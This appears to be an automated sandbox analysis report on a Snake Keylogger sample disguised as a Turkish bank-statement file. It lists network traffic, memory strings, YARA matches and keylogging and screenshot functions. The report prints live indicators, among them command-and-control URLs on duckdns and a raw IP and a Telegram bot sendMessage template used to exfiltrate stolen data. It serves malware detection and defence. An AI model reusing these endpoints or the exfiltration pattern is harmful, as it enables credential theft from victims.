Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 10 Dec 2024 13:08:01 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 10 Dec 2024 13:08:06 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2312501128.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2365523716.0000000002861000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4722755873.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20a
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4722755873.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4722755873.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4722755873.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: UDYiGmDlq.exe, 00000010.00000002.4714892909.0000000003481000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000034B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002D6D000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.000000000347C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBcq
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C6F000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.000000000337F000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.000000000330F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.000000000330F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: UDYiGmDlq.exe, 00000010.00000002.4714892909.000000000330F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C6F000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.0000000003339000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.000000000337F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.175$
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4722755873.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000034B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000034AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBcq

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49856 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.UDYiGmDlq.exe.3a1a880.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.UDYiGmDlq.exe.3a1a880.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.UDYiGmDlq.exe.3a1a880.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.UDYiGmDlq.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 2212, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: UDYiGmDlq.exe PID: 7312, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_024F3E34	1_2_024F3E34
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_024FE124	1_2_024FE124
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_024F6F90	1_2_024F6F90
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_070D1240	1_2_070D1240
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_070D4123	1_2_070D4123
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_070D1230	1_2_070D1230
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_070D3A51	1_2_070D3A51
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_07B3A687	1_2_07B3A687
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_07B34B18	1_2_07B34B18
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_07B34F50	1_2_07B34F50
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_07B33430	1_2_07B33430
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_07B33008	1_2_07B33008
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_07B33878	1_2_07B33878
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 1_2_07B33440	1_2_07B33440
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B3D278	10_2_02B3D278
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B35362	10_2_02B35362
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B3A088	10_2_02B3A088
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B3C19A	10_2_02B3C19A
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B37118	10_2_02B37118
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B3C738	10_2_02B3C738
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B3C468	10_2_02B3C468
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B3CA08	10_2_02B3CA08
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B369B0	10_2_02B369B0
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B3E988	10_2_02B3E988
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B3CFAA	10_2_02B3CFAA
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B3CCD8	10_2_02B3CCD8
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B3F631	10_2_02B3F631
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B3FA88	10_2_02B3FA88
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B339EE	10_2_02B339EE
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B329EC	10_2_02B329EC
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B3E97A	10_2_02B3E97A
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Code function: 10_2_02B33E09	10_2_02B33E09
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_00A13E34	11_2_00A13E34
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_00A1E124	11_2_00A1E124
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_00A16F90	11_2_00A16F90
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07133668	11_2_07133668
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07131240	11_2_07131240
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07134117	11_2_07134117
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07131230	11_2_07131230
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_071311F8	11_2_071311F8
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07136D08	11_2_07136D08
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07299888	11_2_07299888
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07294F50	11_2_07294F50
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07292FF8	11_2_07292FF8
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07293430	11_2_07293430
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07293440	11_2_07293440
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07294B18	11_2_07294B18
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07293008	11_2_07293008
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07293878	11_2_07293878
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07506BB0	11_2_07506BB0
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 11_2_07506BA2	11_2_07506BA2
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_0189C19B	16_2_0189C19B
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_01895362	16_2_01895362
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_0189D278	16_2_0189D278
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_0189C468	16_2_0189C468
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_0189C738	16_2_0189C738
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_0189E988	16_2_0189E988
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_018969A0	16_2_018969A0
